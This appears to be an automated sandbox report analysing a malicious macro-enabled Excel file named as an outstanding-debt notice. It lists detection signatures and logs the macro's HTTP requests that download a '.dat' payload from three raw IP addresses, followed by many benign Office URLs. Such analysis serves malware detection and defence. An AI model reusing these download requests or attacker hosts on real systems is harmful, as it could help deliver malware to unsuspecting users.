Loading ...

Play interactive tourEdit tour

Analysis Report Outstanding-Debt-610716193-05042021.xlsm

Overview

General Information

Sample Name:Outstanding-Debt-610716193-05042021.xlsm
Analysis ID:404168
MD5:b20f59f0dec28c944c62f14fcdeecebb
SHA1:113cdca46cefdbb50697d6f539dcc71bb3a1947a
SHA256:78a9d532ef2c79aa430393c85f8f0351d6fa0578297a7d5d349701670890145b
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 4600 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Source: excel.exeMemory has grown: Private usage: 1MB later: 84MB
Source: global trafficTCP traffic: 192.168.2.3:49717 -> 185.183.99.115:80
Source: global trafficTCP traffic: 192.168.2.3:49717 -> 185.183.99.115:80
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.183.99.115Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.73.159Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.14.37.38Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.115
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.115
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.115
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.115
Source: unknownTCP traffic detected without corresponding DNS query: 51.89.73.159
Source: unknownTCP traffic detected without corresponding DNS query: 51.89.73.159
Source: unknownTCP traffic detected without corresponding DNS query: 51.89.73.159
Source: unknownTCP traffic detected without corresponding DNS query: 51.89.73.159
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.38
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.38
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.38
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.38
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.115
Source: unknownTCP traffic detected without corresponding DNS query: 51.89.73.159
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.38
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.38
Source: unknownTCP traffic detected without corresponding DNS query: 51.89.73.159
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.115
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.183.99.115Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.89.73.159Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44313,6048108796.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.14.37.38Connection: Keep-Alive
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://api.aadrm.com/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://api.cortana.ai
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://api.office.net
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://api.onedrive.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://augloop.office.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://cdn.entity.
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://clients.config.office.net/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://config.edge.skype.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://cortana.ai
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://cortana.ai/api
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://cr.office.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://dev.cortana.ai
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://devnull.onenote.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://directory.services.
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://graph.windows.net
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://graph.windows.net/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://lifecycle.office.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://login.windows.local
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://management.azure.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://management.azure.com/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://messaging.office.com/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://ncus.contentsync.
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://officeapps.live.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://onedrive.live.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://outlook.office.com/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://outlook.office365.com/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://settings.outlook.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://staging.cortana.ai
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://tasks.office.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://wus2.contentsync.
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 16773A9D-D37D-4540-9494-50C371665E6B.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Outstanding-Debt-610716193-05042021.xlsmInitial sample: urlmon
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open, API Microsoft Excel:Application.Run(:Range)
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Outstanding-Debt-610716193-05042021.xlsmInitial sample: EXEC
Source: Outstanding-Debt-610716193-05042021.xlsmOLE, VBA macro line: Private Sub Auto_Open()
Source: VBA code instrumentationOLE, VBA macro: Module Blasr, Function Auto_Open
Source: Outstanding-Debt-610716193-05042021.xlsmOLE indicator, VBA macros: true
Source: classification engineClassification label: mal60.expl.evad.winXLSM@1/9@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{6BB86199-23AC-4089-BAC2-677B457C3A25} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Outstanding-Debt-610716193-05042021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Outstanding-Debt-610716193-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Outstanding-Debt-610716193-05042021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outstanding-Debt-610716193-05042021.xlsmInitial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Outstanding-Debt-610716193-05042021.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
